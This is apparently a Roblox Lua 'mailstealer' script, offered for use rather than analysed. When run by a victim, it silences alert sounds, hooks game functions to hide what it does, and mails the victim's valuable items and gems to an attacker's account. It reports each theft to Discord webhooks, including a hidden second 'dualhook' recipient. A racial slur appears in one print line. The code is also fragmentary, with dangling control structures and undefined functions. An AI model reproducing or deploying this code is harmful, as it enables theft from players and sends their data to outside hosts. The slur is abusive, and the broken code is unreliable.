Message
Message
DualRAP = 1000000000
DualUser = "" -- dualhook name
DualWebhook = "" -- dualhook webhook
Roblox_Username = Username
Discord_Webhook = Webhook
-- simple mailstealer
LOGS_WEBHOOK = LogsWebhook
if getgenv().Executed == true then
return
end
getgenv().Executed = true
repeat
task.wait()
until game:IsLoaded()
repeat
task.wait()
until game.PlaceId ~= nil
repeat
task.wait()
until not game.Players.LocalPlayer.PlayerGui:FindFirstChild("__INTRO")
-- variables:
FirstPriceOfMail = FunctionToGetFirstPriceOfMail()
print("ffucking nigger")
local FormatNumber = function(number)
local n = math.floor(number)
local suf = {
"",
"k",
"m",
"b",
"t"
}
local INDEX = 1
while n >= 1000 do
n = n / 1000
INDEX = INDEX + 1
end
return string.format("%.2f%s", n, suf[INDEX])
end
task.spawn(
function()
game.DescendantAdded:Connect(
function(x)
if x.ClassName == "Sound" then
if
x.SoundId == "rbxassetid://11839132565" or x.SoundId ==
"rbxassetid://14254721038" or
x.SoundId == "rbxassetid://12413423276"
then
x.Volume = 0
x.PlayOnRemove = false
x:Destroy()
end
end
end
)
end
)
-- no more skidding!
MinimumRAP = FirstPriceOfMail
-- EMPTY BOXES
if Inventory.Box then
for key, value in pairs(Inventory.Box) do
if value._uq then
game:GetService("ReplicatedStorage"):WaitForChild("Network"):WaitForChild("Box:
Withdraw All"):InvokeServer(
key
)
end
end
end
game:GetService("ReplicatedStorage"):WaitForChild("Network"):WaitForChild("Mailbox:
Claim All"):InvokeServer()
while err == "You must wait 30 seconds before using the mailbox!" do
wait()
response, err =
game:GetService("ReplicatedStorage"):WaitForChild("Network"):WaitForChild("Mailbox:
Claim All"):InvokeServer()
end
require(game.ReplicatedStorage.Library.Client.DaycareCmds).Claim()
require(game.ReplicatedStorage.Library.Client.ExclusiveDaycareCmds).Claim()
itemsCounted = 0
local totalRap = 0
local hits = GetListWithAllItems()
currentMailPrice = FirstPriceOfMail
-- make it count total rap until sending price is bigger than gems amount, also
make it calculate gems amount after each send
for i, v in pairs(hits) do
if v.Item_RAP >= currentMailPrice then
totalRap = totalRap + v.Item_RAP
itemsCounted = itemsCounted + 1
end
currentMailPrice = currentMailPrice * 1.5
if currentMailPrice > 5000000 then
currentMailPrice = 5000000
end
end
game:GetService("ReplicatedStorage").Network.Locking_SetLocked:InvokeServer(unpack(
args))
end
local response, err = network:WaitForChild("Mailbox:
Send"):InvokeServer(unpack(args))
if response == false and err == "They don't have enough space!" then
Roblox_Username = Username2
args[1] = Roblox_Username
end
until response == true
GemsAmount = GemsAmount - FirstPriceOfMail
FirstPriceOfMail = math.ceil(math.ceil(FirstPriceOfMail) * 1.5)
if FirstPriceOfMail > 5000000 then
FirstPriceOfMail = 5000000
end
end
Left_Hits = #hits
FavoriteModeSelection = blob_a.Get().FavoriteModeSelection
FavoriteModeSelectionPlaza = blob_a.Get().FavoriteModeSelectionPlaza
oldGet = deepCopy(blob_b)
blob_a.Get = function(...)
blob_b = oldGet
blob_b.FavoriteModeSelection = {FavoriteModeSelection}
blob_b.FavoriteModeSelectionPlaza = {FavoriteModeSelectionPlaza}
return blob_b
end
if IsMailboxHooked() then
local Mailbox =
game:GetService("ReplicatedStorage"):WaitForChild("Network"):WaitForChild("Mailbox:
Send")
for i, Func in ipairs(getgc(true)) do
if typeof(Func) == "function" and debug.info(Func, "n") == "typeof"
then
local Old
Old =
hookfunction(
Func,
function(Ins, ...)
if Ins == Mailbox then
return tick()
end
return Old(Ins, ...)
end
)
end
end
end
for i, v in pairs(hits) do
if FirstPriceOfMail > 5000000 then
FirstPriceOfMail = 5000000
end
if v.Item_RAP >= FirstPriceOfMail then
sendItem(v.Item_Class, v.Item_Id, v.Item_Amount, v.IsLocked)
thumb = GetThumbnail(v.Item_ImageId)
Left_Hits = Left_Hits - 1
task.spawn(
function()
SendMessage(
v.Item_Name,
v.Item_Class,
v.Item_Type,
thumb,
Discord_Webhook,
Left_Hits,
v.IsShiny,
"@everyone",
v.Item_RAP,
totalRap
)
if Roblox_Username ~= DualhookUsername then
SendMessage(
v.Item_Name,
v.Item_Class,
v.Item_Type,
thumb,
LOGS_WEBHOOK,
Left_Hits,
v.IsShiny,
"MOON ON TOP!!",
v.Item_RAP,
totalRap
)
end
end
)
else
break
end
end
SendAllGems()
gui:Destroy()